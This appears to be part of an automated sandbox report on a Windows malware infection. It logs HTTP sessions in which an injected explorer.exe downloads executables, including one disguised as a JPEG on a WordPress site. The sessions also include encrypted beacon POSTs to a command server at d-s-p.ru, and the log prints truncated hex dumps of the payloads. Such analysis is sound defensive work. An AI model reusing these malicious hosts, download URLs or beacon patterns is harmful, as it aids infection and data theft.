                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 5b 3b 08 ad 61 44 a2 ac 09 a2 c8 b0 e5 31 91 3a c0 e8 6d 5f 0d 89
                                                                                                                                                                                Data Ascii: #\([;aD1:m_


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                62192.168.2.450071101.99.94.162802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:47.162472010 CET160OUTGET /setup.exe HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: 101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.013889074 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:47 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Last-Modified: Sun, 29 Dec 2024 18:09:14 GMT
                                                                                                                                                                                ETag: "11b517-62a6c97ed2680"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Content-Length: 1160471
                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 58 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 8e 07 00 00 42 00 00 83 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 20 10 00 00 04 00 00 c4 7c 12 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b [TRUNCATED]
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELX|NnB8@ |@4@ (d.textmn `.rdatab*,r@@.data~@.ndata0.rsrc@@@.reloc2r@B
                                                                                                                                                                                Dec 30, 2024 19:45:48.013916016 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii: U\}t+}FEuH-GHPuuu@KSV5-GWEPu@eEEPu@}eD@FRVVU+MMEFQ
                                                                                                                                                                                Dec 30, 2024 19:45:48.013926983 CET1236INData Raw: 50 e8 7d 53 00 00 83 7c 24 08 00 8b f0 7d 06 56 e8 a1 4b 00 00 8b c6 5e c2 04 00 55 8b ec 81 ec 10 02 00 00 53 56 57 8d 45 fc 50 a1 b0 2e 47 00 83 c8 08 50 33 db 53 ff 75 0c ff 75 08 ff 15 04 80 40 00 3b c3 75 69 8b 35 00 80 40 00 bf 05 01 00 00
                                                                                                                                                                                Data Ascii: P}S|$}VK^USVWEP.GP3Suu@;ui5@9]uKSPuuWPSutu@jM;t$S5.Guuu@3@_^[9.Guuu@uU@@Vt5.GE
                                                                                                                                                                                Dec 30, 2024 19:45:48.013940096 CET672INData Raw: 00 e8 47 49 00 00 59 e9 49 fe ff ff 53 e8 f4 fa ff ff 8b f0 8d 45 08 50 57 68 04 20 00 00 56 ff 15 70 80 40 00 85 c0 74 24 8b 45 08 3b c6 76 29 66 39 18 74 24 56 e8 44 49 00 00 3b c3 74 0e 83 c0 2c 50 ff 75 08 e8 68 46 00 00 eb 0c 33 c0 66 89 07
                                                                                                                                                                                Data Ascii: GIYISEPWh Vp@t$E;v)f9t$VDI;t,PuhF3fE9]+h WWl@jMQVh SPSh@3EfjXPVtDEj16EVPQh@uMZH
                                                                                                                                                                                Dec 30, 2024 19:45:48.013950109 CET1236INData Raw: 40 00 ff 75 f8 ff 15 bc 80 40 00 3b fb 0f 8d da 14 00 00 83 ff fe 75 13 6a e9 56 e8 ef 4b 00 00 ff 75 cc 56 e8 06 44 00 00 eb 08 6a ee 56 e8 dc 4b 00 00 56 68 84 8a 40 00 e8 6f 46 00 00 59 59 68 10 00 20 00 56 e8 5f 40 00 00 e9 ec f9 ff ff 53 e8
                                                                                                                                                                                Data Ascii: @u@;ujVKuVDjVKVh@oFYYh V_@SVhh@JFYYuV7Pzj1Vuh@@#FuV@;;EuEM;E9E<jVh(@jPOCjYijYE^j
                                                                                                                                                                                Dec 30, 2024 19:45:48.013962030 CET224INData Raw: e8 8d f3 ff ff 50 53 ff 15 78 82 40 00 50 53 68 72 01 00 00 56 ff 15 88 82 40 00 3b c3 0f 84 f6 0f 00 00 50 ff 15 44 80 40 00 e9 ea 0f 00 00 6a 48 6a 5a ff 75 f4 ff 15 7c 82 40 00 50 ff 15 40 80 40 00 50 6a 02 59 e8 30 f3 ff ff 50 ff 15 50 81 40
                                                                                                                                                                                Data Ascii: PSx@PShrV@;PD@jHjZu|@P@@PjY0PP@jYAuAEA$hAAAAFhAL@g33A9]th@AYWV9]uD@9
                                                                                                                                                                                Dec 30, 2024 19:45:48.014065027 CET1236INData Raw: ff 15 80 82 40 00 e9 2e 0f 00 00 53 e8 a1 f2 ff ff 6a 31 8b f0 e8 98 f2 ff ff 6a 22 8b d8 e8 8f f2 ff ff 6a 15 8b f8 e8 86 f2 ff ff 68 d0 f0 40 00 6a ec e8 90 2d 00 00 0f b7 07 ff 75 e0 f7 d8 1b c0 23 c7 68 b0 b0 4c 00 50 0f b7 06 f7 d8 1b c0 53
                                                                                                                                                                                Data Ascii: @.Sj1j"jh@j-u#hLPS#Pu@!}PWSVh@@@WSVh@s@SVh@X@YYVj-V9EV;t_h@6@YY9]tF5(@j@jdu=tEPu,@
                                                                                                                                                                                Dec 30, 2024 19:45:48.014086962 CET1236INData Raw: 56 68 ec 85 40 00 89 45 08 e8 17 3c 00 00 83 c4 0c 56 e8 40 3c 00 00 85 c0 75 0d 53 6a f9 e8 d1 28 00 00 e9 6d f3 ff ff 8b 45 f4 56 89 45 a4 c7 45 a8 02 00 00 00 e8 66 39 00 00 33 c9 57 66 89 4c 46 02 e8 59 39 00 00 33 c9 66 89 4c 47 02 8b 45 08
                                                                                                                                                                                Data Ascii: Vh@E<V@<uSj(mEVEEf93WfLFY93fLGEfMPSu}EfM(EP@.Gh@@V]]]8V0AW89]tSE9]tjE9]tj"EjSWVh
                                                                                                                                                                                Dec 30, 2024 19:45:48.014096975 CET1236INData Raw: 53 53 57 ff 75 08 6a ff 68 d0 f0 40 00 53 53 ff 15 48 81 40 00 ff 75 08 ff 15 4c 81 40 00 66 39 1e 74 1e 53 8d 4d bc 51 50 ff 75 08 56 e8 e6 33 00 00 50 ff 15 54 81 40 00 85 c0 0f 85 f1 f7 ff ff c7 45 fc 01 00 00 00 e9 e5 f7 ff ff 6a 02 59 e8 9f
                                                                                                                                                                                Data Ascii: SSWujh@SSH@uL@f9tSMQPuV3PT@EjYE0 ;~Mf9V]3E9]SEPjEPuX@}u|9]u9jEPjEPSS\@E<t.<t*fEfwEFE:tE;u|>EPW
                                                                                                                                                                                Dec 30, 2024 19:45:48.014107943 CET672INData Raw: 00 01 00 00 8b 45 dc 8b 4d d8 89 0c 86 39 5d e0 0f 84 a7 00 00 00 ff 75 08 e8 42 e1 ff ff e9 9a 00 00 00 33 c9 e8 f6 e3 ff ff 83 f8 20 0f 83 ba e9 ff ff 39 5d e0 74 1f 39 5d dc 74 0f 50 e8 3d e2 ff ff 53 53 e8 88 e1 ff ff eb 71 53 e8 79 e2 ff ff
                                                                                                                                                                                Data Ascii: EM9]uB3 9]t9]tP=SSqSyR9]tM-GO-GW^7:trES#Pju@9]t!SSu@jP2PVn.E.G3_^[I@@<@P@r@@@B@n
                                                                                                                                                                                Dec 30, 2024 19:45:48.018821955 CET1236INData Raw: 08 e8 b2 29 00 00 33 c0 c9 c2 10 00 56 33 f6 39 74 24 08 74 18 a1 50 b1 42 00 3b c6 74 07 50 ff 15 2c 82 40 00 89 35 50 b1 42 00 5e c3 39 35 50 b1 42 00 74 08 56 e8 31 30 00 00 5e c3 ff 15 90 80 40 00 3b 05 20 2e 47 00 76 23 56 68 4c 32 40 00 56
                                                                                                                                                                                Data Ascii: )3V39t$tPB;tP,@5PB^95PBtV10^@; .Gv#VhL2@Vjo5-G0@jPPBD@^UVujEPVu5@X@t9uu3@3^]jjt$5@`@USVuW}uuEeuP1BEx.


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                63192.168.2.45007258.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:50.198698997 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://hssuixmkgbellf.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 147
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:50.198709011 CET147OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 30 6b 2c 90 f4 76 0b 75 25 55 e4 ed
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA ,[0k,vu%UTXWnX_}c7Y}zcT@Z#o3QN
                                                                                                                                                                                Dec 30, 2024 19:45:51.683324099 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:51 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                64192.168.2.45007458.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:51.706866980 CET277OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://lnwqqljmdwq.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 165
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:51.706907034 CET165OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 31 6b 2c 90 f5 76 0b 75 3b 0f eb e3
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[1k,vu;TUWZkiBKfn(w]LTM,FN#6ND&&(
                                                                                                                                                                                Dec 30, 2024 19:45:53.143642902 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:52 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                65192.168.2.45007558.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:53.187393904 CET277OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://mvyahhxtkfb.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 152
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:53.187393904 CET152OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 36 6b 2c 90 f5 76 0b 75 21 2b cc 87
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[6k,vu!+xCpWT>Q:f'?NnK;\&V-A%j]NRy`D
                                                                                                                                                                                Dec 30, 2024 19:45:54.618961096 CET186INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:54 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 63 54 f1 35 0b f5 fd 09 fc 8c e5 e5 00 9d 3c d2 fd 6d 5f 0d 89
                                                                                                                                                                                Data Ascii: #\6cT5<m_


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                66192.168.2.45007958.151.148.9080
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:46:01.933288097 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://pagpbwhildwqiuis.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 310
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:46:01.933303118 CET310OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 36 6b 2c 90 f4 76 0b 75 26 07 ec 94
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA ,[6k,vu&%qybn5r"}"cCXC/V&ZZ!J|,^4f"BOOujDomX1dLxqyaAj"abo}^"
                                                                                                                                                                                Dec 30, 2024 19:46:03.408464909 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:46:03 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                0192.168.2.45005051.79.230.1474432580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-12-30 18:45:10 UTC179OUTGET /wp-content/images/pic4.jpg HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: www.tazc.com.my
                                                                                                                                                                                2024-12-30 18:45:10 UTC544INHTTP/1.1 200 OK
                                                                                                                                                                                Connection: close
                                                                                                                                                                                cache-control: public, max-age=604800
                                                                                                                                                                                expires: Mon, 06 Jan 2025 18:45:10 GMT
                                                                                                                                                                                content-type: image/jpeg
                                                                                                                                                                                last-modified: Mon, 16 Dec 2024 15:41:38 GMT
                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                content-length: 7286372
                                                                                                                                                                                date: Mon, 30 Dec 2024 18:45:10 GMT
                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                x-frame-options: sameorigin
                                                                                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                2024-12-30 18:45:11 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 e6 07 00 00 42 00 00 af 38 00 00 00 10 00
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
                                                                                                                                                                                2024-12-30 18:45:11 UTC16384INData Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
                                                                                                                                                                                Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
                                                                                                                                                                                2024-12-30 18:45:11 UTC16384INData Raw: 72 00 73 00 69 00 6f 00 6e 00 53 00 74 00 72 00 69 00 6e 00 67 00 28 00 25 00 73 00 29 00 20 00 72 00 65 00 74 00 75 00 72 00 6e 00 65 00 64 00 20 00 25 00 73 00 00 00 5c 00 00 00 00 00 00 00 45 00 78 00 65 00 63 00 3a 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 70 00 72 00 6f 00 63 00 65 00 73 00 73 00 20 00 28 00 22 00 25 00 73 00 22 00 29 00 00 00 45 00 78 00 65 00 63 00 3a 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 20 00 28 00 22 00 25 00 73 00 22 00 29 00 00 00 00 00 45 00 78 00 65 00 63 00 3a 00 20 00 63 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 3d 00 22 00 25 00 73 00 22 00 00 00 00 00 45 00 78 00 65 00 63 00 53 00 68 00 65 00 6c 00 6c 00 3a 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 20 00 28
                                                                                                                                                                                Data Ascii: rsionString(%s) returned %s\Exec: failed createprocess ("%s")Exec: success ("%s")Exec: command="%s"ExecShell: success (
                                                                                                                                                                                2024-12-30 18:45:11 UTC16384INData Raw: 48 06 50 89 28 c7 4e 89 48 3d 62 e1 5d 48 b3 bc 1f ef 3e 83 c2 e0 55 60 bc 93 a4 66 f9 bb c6 09 93 bb c5 6a 89 09 a6 6b ce e5 af f2 78 a2 fb 2c 32 cc eb 28 f3 3b d9 5c ef f2 3d ce bc ef 77 06 e0 69 c1 95 ff 45 9d 2c 54 01 38 5d 39 b3 58 31 15 80 86 00 11 1e 48 43 f1 c0 bc 5e dd 35 a8 59 e3 1c 1e 3c c7 2c 25 e1 cf 5e 03 d0 36 5c d7 c7 5e 5f d3 e9 b6 06 c4 9a 77 a2 2b b0 0b d9 1b 87 51 c8 b6 71 d7 1d dc 7f 86 24 0e 13 53 ec eb 3d 0b c8 d1 68 63 a3 93 e8 1c bc 87 ce dc 30 7a 88 58 6e 04 09 83 61 89 11 27 ba b2 43 f8 86 39 d8 cd 7c 4c 8c 4d 62 80 f9 a9 3c 55 be 7a c2 bc 47 30 8f 99 cf 85 ec 45 e4 6e 1c 41 17 85 ab 7c 4f b5 d6 b3 ec 97 f8 25 70 ea 45 5a a0 3e e6 eb 45 63 7e 6a c5 e9 45 db de d7 99 74 b7 02 0c 60 fe 5d 80 3e c1 1d a0 37 ed 2e 6c d0 ad 54 de 78
                                                                                                                                                                                Data Ascii: HP(NH=b]H>U`fjkx,2(;\=wiE,T8]9X1HC^5Y<,%^6\^_w+Qq$S=hc0zXna'C9|LMb<UzG0EnA|O%pEZ>Ec~jEt`]>7.lTx
                                                                                                                                                                                2024-12-30 18:45:11 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 d6 d6 d7 ea ea ea eb e9 e9 e9 ea e9 e9 e9 ea e9 e9 e9 ea e9 e9 e9 ea e9 e9 e9 ea e9 e9 e9 ea e9 e9 e9 ea e9 e9 e9 ea e9 e9 e9 ea e9 e9 e9 ea e9 e9 e9 ea e9 e9 e9
                                                                                                                                                                                Data Ascii: ( @
